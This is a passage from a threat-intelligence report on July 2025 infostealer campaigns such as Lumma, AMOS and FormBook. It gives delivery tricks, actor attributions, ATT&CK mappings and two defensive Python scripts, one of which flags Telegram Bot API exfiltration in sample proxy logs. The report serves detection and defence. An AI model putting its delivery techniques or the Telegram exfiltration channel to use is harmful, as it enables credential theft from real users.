  • After stealing the data, the malware ran a cleanup script to erase its own tracks, making detection harder.
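Exfiltration through Telegram's Bot API, as used here (and as the HijackLoader stage in the Chemia chain uses Telegram for C2), rides over ordinary HTTPS to api.telegram.org, so the network-side tell is the destination rather than the protocol. The script below is an added example, not from the report or Arctic Wolf: it reviews proxy log lines, extracts the bot ID and method when the full URL is visible (TLS inspection or endpoint URL telemetry), treats upload methods such as sendDocument as high severity, and falls back to flagging bare CONNECT tunnels to api.telegram.org from non-browser user agents. The log lines, bot token and addresses are constructed.

```python
import re
from typing import Dict, List

# Bot API URL shape: https://api.telegram.org/bot<bot_id>:<token>/<method>
BOT_API_RE = re.compile(r"api\.telegram\.org/bot(\d{6,12}):([A-Za-z0-9_-]{30,})/(\w+)")
CONNECT_RE = re.compile(r"\bCONNECT\s+api\.telegram\.org:443\b")
BROWSER_UA = re.compile(r"Mozilla/5\.0|Chrome/|Safari/|Firefox/")
UPLOAD_METHODS = {"senddocument", "sendphoto", "sendvideo", "sendaudio"}


def classify(line: str) -> Dict[str, object]:
    """Classify one proxy log line. A full URL gives the bot ID to pivot on; with a plain
    forward proxy only the CONNECT tunnel is visible, which still merits a look when the
    client is not a browser."""
    finding: Dict[str, object] = {"line": line, "severity": "none", "bot_id": None, "method": None}
    m = BOT_API_RE.search(line)
    if m:
        bot_id, _token, method = m.groups()
        finding.update(bot_id=bot_id, method=method)
        finding["severity"] = "high" if method.lower() in UPLOAD_METHODS else "medium"
        return finding
    if CONNECT_RE.search(line) and not BROWSER_UA.search(line):
        finding["severity"] = "medium"
    return finding


def review(lines: List[str]) -> List[Dict[str, object]]:
    return [f for f in (classify(line) for line in lines) if f["severity"] != "none"]


# Constructed proxy records; the bot token and internal addresses are made up
SAMPLE_LOG = [
    '2025-07-14T10:02:11Z 10.0.5.23 GET https://www.example.com/ 200 ua="Mozilla/5.0 (Windows NT 10.0) Chrome/126.0"',
    '2025-07-14T10:02:40Z 10.0.5.23 POST https://api.telegram.org/bot7012345678:AAHexampleexampleexampleexample12345/sendDocument 200 ua="python-requests/2.32"',
    '2025-07-14T10:03:01Z 10.0.5.44 CONNECT api.telegram.org:443 200 ua="Mozilla/5.0 (Macintosh) Firefox/128.0"',
    '2025-07-14T10:03:30Z 10.0.5.61 CONNECT api.telegram.org:443 200 ua="-"',
]

if __name__ == "__main__":
    for f in review(SAMPLE_LOG):
        print(f["severity"], f["bot_id"], f["method"], f["line"])
```

The bot ID (the digits before the colon) is stable across campaigns that reuse a bot, which makes it a better pivot than the token, and a report to Telegram's abuse channel can retire the bot outright.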

Massive Surge in Credential Theft: 1.8 Billion Records Stolen in 2025 So Far

Image source : Flashpoint

In a staggering revelation, Flashpoint’s Global Threat Intelligence Index – Midyear 2025 has reported an 800% increase in credential theft incidents compared to previous years. In just the first half of 2025, attackers successfully exfiltrated an estimated 1.8 billion credentials from 5.8 million compromised systems, marking a historic high in the infostealer malware landscape.

This explosive growth is largely attributed to the widespread availability and affordability of infostealer malware on underground forums. Malware like RedLine, Lumma, StealC, and Acreed are commonly sold for as little as $60, making them an accessible tool for both low-level cybercriminals and more organized threat groups. These infostealers quietly siphon off login credentials, session tokens, and sensitive files from victims' devices often with minimal detection.

Once credentials are harvested, they are typically packaged and sold or reused in further attacks. These credentials often become entry points for broader intrusions, leading to ransomware deployment, business email compromise (BEC), or lateral movement within corporate networks. Flashpoint analysts noted that credential-based intrusions were responsible for 78% of all reported data breaches in the first half of the year.

Exploit and Delivery Vectors Deep Dive

Each infostealer in these campaigns arrived through specific delivery techniques and exploit vectors:

Crazy Evil Campaign

  • Vector: Social engineering via fake job offers on LinkedIn and Twitter.
  • Method: Victims are lured with Web3 job postings. Clicking the link downloads a ZIP containing malicious shell scripts posing as offer letters or company materials.
  • Payload: Installs malware like AMOS, StealC, or Angel Drainer silently.
  • Key Trick: Uses credible-looking roles and trusted platforms to lower suspicion and bypass antivirus.

PureLogs Stealer

  • Vector: Both email phishing and abused legitimate websites.
  • Method 1: Macro-laced Excel invoices sent via email fetch stealer once macros are enabled.
  • Method 2: Loader DLLs disguised as PDFs hosted on hacked websites (e.g., a Swedish realty site).
  • Payload: Stealer launched through decrypted loaders.
  • Key Trick: Uses invoice themes and trusted URLs to improve success rate.

Java based MaksStealer

  • Vector: Community-driven platforms like Discord, forums, and YouTube.
  • Method: Promoted as a Minecraft cheat mod called “MaxCoffe.” Users are tricked into downloading a .jar file.
  • Payload: Java-based infostealer.
  • Key Trick: Leverages trust in gaming tools and mod culture for easy spread.

Go based Debian Stealer

  • Vector: Limited, likely manual or private distribution.
  • Method: Possibly spread through rogue update tools, spoofed hacking forums, or phishing messages.
  • Payload: Steals system and geolocation data.
  • Key Trick: Relies on targeted delivery and user curiosity to infect.

Braodo Stealer

  • Vector: Spam emails with .bat file attachments.
  • Method: Malicious batch file downloads more malware from GitHub using PowerShell or BITSAdmin.
  • Payload: Python modules and Braodo ZIP archive.
  • Key Trick: Uses GitHub as a delivery host to blend in with normal web traffic.

Python based BOFAMET

  • Vector: Malspam, fake installers, malvertising, or Trojanized keygens.
  • Method: Sold via underground forums, BOFAMET is shared like plug-and-play malware.
  • Payload: Python-based infostealer with C2 control.
  • Key Trick: MaaS model ensures widespread use by low-skill attackers via common vectors.

FormBook (Italian Campaign)

  • Vector: Spear-phishing emails spoofing Italian companies.
  • Method: Either a .pif executable attached directly to the email, or a PDF whose links lead to password-protected ZIPs containing macro-enabled Office documents.
  • Payload: FormBook, run directly from the .pif or downloaded once macros are enabled.
  • Key Trick: Splits attack across file formats to evade security filters.

AMOS (Atomic macOS Stealer)

  • Vector: Fake Homebrew sites, Google Ads, and phishing via dev tools or crypto apps.
  • Method: Malicious shell scripts disguised as terminal install commands.
  • Payload: Stealer + backdoor that survives reboot and accepts remote commands.
  • Key Trick: Poses as trusted macOS utilities and developer tools to gain access.

Lumma Stealer

  • Vector: Fake cracked software pages and sponsored ads.
  • Method: Redirects through Russian infrastructure (e.g., Selectel) using traffic filtering and password-protected downloads.
  • Payload: Encrypted Lumma loaders.
  • Key Trick: Avoids domain takedowns and leverages cracked software culture.

Steam Supply‑Chain Attack (Chemia Game)

  • Vector: Supply-chain attack via Steam game installer.
  • Method: Chemia installer hosted HijackLoader, which then downloaded Fickle Stealer.
  • Payload: Credential stealer DLL (cclib.dll) from external source.
  • Key Trick: Abused game trust and Steam platform to blend in.

Endgame Gear Config Tool Trojan

  • Vector: Supply chain compromise on official vendor site.
  • Method: XRed RAT inserted into legitimate download for OP1w 4K V2 tool.
  • Payload: Remote access trojan enabling persistence and data theft.
  • Key Trick: Hosted on the company’s own CDN, adding credibility.

Shellter Elite Abuse Campaign

  • Vector: RAR attachments in phishing emails.
  • Method: Leaked Shellter Elite used to wrap payloads such as the Rhadamanthys stealer or SectopRAT.
  • Payload: Polymorphic binaries that bypass antivirus.
  • Key Trick: Disguised as marketing partnerships or sponsorship deals targeting influencers and gamers.

GIFTEDCROOK (Ukraine-focused)

  • Vector: Spear-phishing via military-themed PDFs.
  • Method: PDF directs the victim to a Mega.nz-hosted Excel workbook whose macros drop the loader.
  • Payload: Stealer that collects browser data, VPN configs, and document metadata.
  • Key Trick: Encrypts stolen data with XOR and sends via Telegram bots.

Threat Actor Attribution

Several threat actor groups were identified or suspected in these campaigns. The table below summarizes known actors, their regions, typical motives, preferred targets, and associated malware:

| Threat Actor / Group | Region | Motives | Targets | Associated Malware |
|---|---|---|---|---|
| Crazy Evil | Russia/Eastern Europe | Financial (cryptocurrency theft) | Crypto users (macOS & Windows) | AMOS, StealC, Angel Drainer |
| Italian FormBook Campaign | Italy | Credential theft, corporate espionage | Italian businesses (energy, procurement) | FormBook |
| PureLogs Stealer Operators | Global | Data resale, credential theft | General users via phishing/malvertising | PureLogs Stealer |
| Vietnamese Braodo Group | Vietnam | Financial fraud via stolen credentials | Vietnam, US, EU tech users | Braodo Stealer |
| MaksStealer Distributors | Unknown | Account theft, crypto theft | Minecraft gamers (Hypixel mod community) | MaksStealer (Java) |
| BOFAMET Developer | Unknown | Mass data theft, malware-as-a-service | Global Windows users | BOFAMET (Python-based) |
| Debian Stealer Author | Unknown | Reconnaissance & credential theft | Global Windows users | Debian Stealer (Go-based) |
| AMOS Group | Russia-affiliated | Long-term access, surveillance, theft | macOS users (devs, crypto holders) | Atomic macOS Stealer (AMOS) |
| EncryptHub (Steam Supply Chain) | Unknown | Credential theft via game installers | Steam gamers (Chemia) | Vidar, Fickle Stealer, HijackLoader |
| XRed Campaign | Unknown | Espionage and user surveillance | Endgame Gear users | XRed RAT |
| Shellter Elite Abuse Actors | Unknown | Malware distribution via red-team tools | Influencers, gamers, content creators | Rhadamanthys, SectopRAT via Shellter |
| GIFTEDCROOK | Likely Russian | Government surveillance | Ukrainian public sector (military, civic) | GIFTEDCROOK loader + credential stealer |
| Lumma Stealer Operators | Global | Financial gain through credential resale | Global victims via ads, cracked software | Lumma Stealer |

Table: Threat actors and groups linked to the July 2025 campaigns.

Infostealer Impact Trends – July 2025

The charts below highlight key trends observed throughout July related to infostealer activity. Over the course of four weeks, we tracked which domains, email providers, social media platforms, and countries were most frequently targeted or compromised by active infostealer campaigns.

Top 10 Most Compromised Domains

Top 10 Most Compromised Email Providers

Top 10 Most Compromised Social Media Platforms

Top 10 Most Infected Countries

Key Observations:

  • google.com consistently ranked as the most compromised domain, with over 35,000 credential hits across the month, making it the top target for infostealers.
  • Among email providers, Gmail led by a wide margin, with over 1.5 million compromised accounts, reflecting its global popularity and the frequency with which stolen Gmail credentials are reused in credential stuffing attacks.
  • On the social media front, Facebook and Instagram were the most targeted platforms, pointing to attackers’ interest in hijacking high-traffic user accounts for fraud, scams, or resale.
  • In terms of geography, India experienced the highest number of infections, followed by Brazil, the U.S., and Indonesia. This suggests a strong regional targeting pattern, possibly linked to user volume, language lures, or regional campaign infrastructure.

While activity fluctuated significantly across the month, there were major spikes on the 28th, 29th, and 30th, indicating possible coordinated campaigns or malware outbreaks during those days.

YARA Rules

For detection of known stealers observed in the report:

TTP Matrix (MITRE ATT&CK Mapping)

Malware / Campaign | Initial Access | Execution | Persistence | Exfiltration | C2 Communication
Crazy Evil Campaign | T1566.002 (Spearphishing via Social Media), T1189 (Drive-by Compromise) | T1059.006 (JavaScript/Shell), T1059.004 (AppleScript) | T1547.001 (Launch Agent) | T1041 (Data over C2) | T1071.001 (HTTP/S), T1095 (Non-Application Layer Protocol)
Lumma Stealer | T1189 (Malvertising), T1566.001 (Phishing) | T1059.003 (Batch/Powershell) | T1053.005 (Scheduled Task) | T1003 (Credential Dumping), T1041 | T1071.001
Steam/Chemia Supply Chain (Vidar, Fickle) | T1195.002 (Software Supply Chain) | T1059.001 (PowerShell) | T1547.001 (Registry Run Key) | T1041 | T1071.001
Endgame Gear (XRed) | T1195.002 | T1059.003 | T1547.001 | T1005, T1041 | T1071.001
Shellter Elite Campaign (Rhadamanthys, ARECHCLIENT2) | T1566.001 (Phishing), T1189 | T1059.003 (Backdoored Executables), T1027 (Obfuscated Files) | T1053.005 | T1005, T1056.001 | T1071.001
GIFTEDCROOK (Ukraine) | T1566.001 | T1059.005 (Office Macros) | T1547.001 | T1041 (Encoded Exfiltration via Telegram) | T1071.001 (Telegram API)
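As an added example, not part of the report, the Python below parses the matrix above (re-typed here in pipe-delimited form) and ranks each ATT&CK technique by how many of the month's campaigns share it, a quick way to decide which detections give the broadest coverage. The column names and the ranking heuristic are my own assumptions.

```python
import re
from collections import defaultdict

# Constructed sample: the report's TTP matrix rows in pipe-delimited form.
# Columns: campaign | initial access | execution | persistence | exfiltration | C2
TTP_MATRIX = """\
Crazy Evil Campaign | T1566.002 (Spearphishing via Social Media), T1189 (Drive-by Compromise) | T1059.006 (JavaScript/Shell), T1059.004 (AppleScript) | T1547.001 (Launch Agent) | T1041 (Data over C2) | T1071.001 (HTTP/S), T1095 (Non-Application Layer Protocol)
Lumma Stealer | T1189 (Malvertising), T1566.001 (Phishing) | T1059.003 (Batch/Powershell) | T1053.005 (Scheduled Task) | T1003 (Credential Dumping), T1041 | T1071.001
Steam/Chemia Supply Chain (Vidar, Fickle) | T1195.002 (Software Supply Chain) | T1059.001 (PowerShell) | T1547.001 (Registry Run Key) | T1041 | T1071.001
Endgame Gear (XRed) | T1195.002 | T1059.003 | T1547.001 | T1005, T1041 | T1071.001
Shellter Elite Campaign (Rhadamanthys, ARECHCLIENT2) | T1566.001 (Phishing), T1189 | T1059.003 (Backdoored Executables), T1027 (Obfuscated Files) | T1053.005 | T1005, T1056.001 | T1071.001
GIFTEDCROOK (Ukraine) | T1566.001 | T1059.005 (Office Macros) | T1547.001 | T1041 (Encoded Exfiltration via Telegram) | T1071.001 (Telegram API)
"""

# Tactic column names are an assumption made for this example.
TACTICS = ["initial_access", "execution", "persistence", "exfiltration", "c2"]
# ATT&CK technique ids: T followed by four digits, optional .NNN sub-technique.
TECH_RE = re.compile(r"\bT\d{4}(?:\.\d{3})?\b")

def parse_matrix(text):
    """Return {campaign: {tactic: [technique ids]}}; the free-text labels are dropped."""
    matrix = {}
    for line in text.splitlines():
        cells = [c.strip() for c in line.split("|")]
        if len(cells) != len(TACTICS) + 1:
            raise ValueError(f"expected {len(TACTICS) + 1} columns: {line!r}")
        campaign, *cols = cells
        matrix[campaign] = {t: TECH_RE.findall(c) for t, c in zip(TACTICS, cols)}
    return matrix

def technique_coverage(matrix):
    """Map each technique id to the set of campaigns that use it."""
    cov = defaultdict(set)
    for campaign, tactics in matrix.items():
        for ids in tactics.values():
            for tid in ids:
                cov[tid].add(campaign)
    return dict(cov)

def prioritise(matrix, top=5):
    """Techniques ranked by campaign count (ties broken by id): detection priority."""
    cov = technique_coverage(matrix)
    ranked = sorted(cov.items(), key=lambda kv: (-len(kv[1]), kv[0]))
    return [(tid, len(camps)) for tid, camps in ranked[:top]]

def shared_by_all(matrix):
    """Techniques every campaign in the matrix relies on."""
    cov = technique_coverage(matrix)
    return sorted(t for t, c in cov.items() if len(c) == len(matrix))

if __name__ == "__main__":
    m = parse_matrix(TTP_MATRIX)
    for tid, n in prioritise(m):
        print(f"{tid:<10} used by {n} of {len(m)} campaigns")
    print("common to all:", shared_by_all(m))
```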

References

https://hackedlist.io/statistics

https://www.infostealers.com/info-stealers-reports/

https://x.com/JAMESWT_WT/status/1946172962316374137

https://x.com/JAMESWT_WT/status/1942498358645645794

https://cert-agid.gov.it/news/formbook-diffuso-via-macro-office-nel-mirino-aziende-coinvolte-in-gare-e-progetti/

https://x.com/suyog41/status/1940651372304912734

https://x.com/ShadowOpCode/status/1940729513119531217

https://x.com/JAMESWT_WT/status/1940759621419127277

https://x.com/JAMESWT_WT/status/1940759080488022229

https://www.netresec.com/?page=Blog&month=2025-07&post=PureLogs-Forensics

https://thehackernews.com/2025/02/crazy-evil-gang-targets-crypto-with.html?utm_source=chatgpt.com

https://x.com/1ZRR4H/status/1940168409381232826

https://www.trendmicro.com/en_us/research/25/g/lumma-stealer-returns.html

https://www.bleepingcomputer.com/news/security/hacker-sneaks-infostealer-malware-into-early-access-steam-game/

https://www.tomshardware.com/tech-industry/cyber-security/hacker-plants-three-strains-of-malware-in-a-steam-early-access-game-called-chemia-security-company-found-crypto-jacking-infostealers-and-a-backdoor-to-install-yet-more-malware-in-the-future

http://github.com/prodaft/malware-ioc/blob/master/LARVA-208/SteamCampaign.md

https://www.reddit.com/r/EndGameGear/comments/1m29q06/security_alert_endgame_gears_op1w_4k_v2/

https://www.elastic.co/security-labs/taking-shellter

https://moonlock.com/amos-backdoor-persistent-access

https://flashpoint.io/blog/flashpoint-2025-global-threat-intelligence-index-midyear/

Indicators & Samples
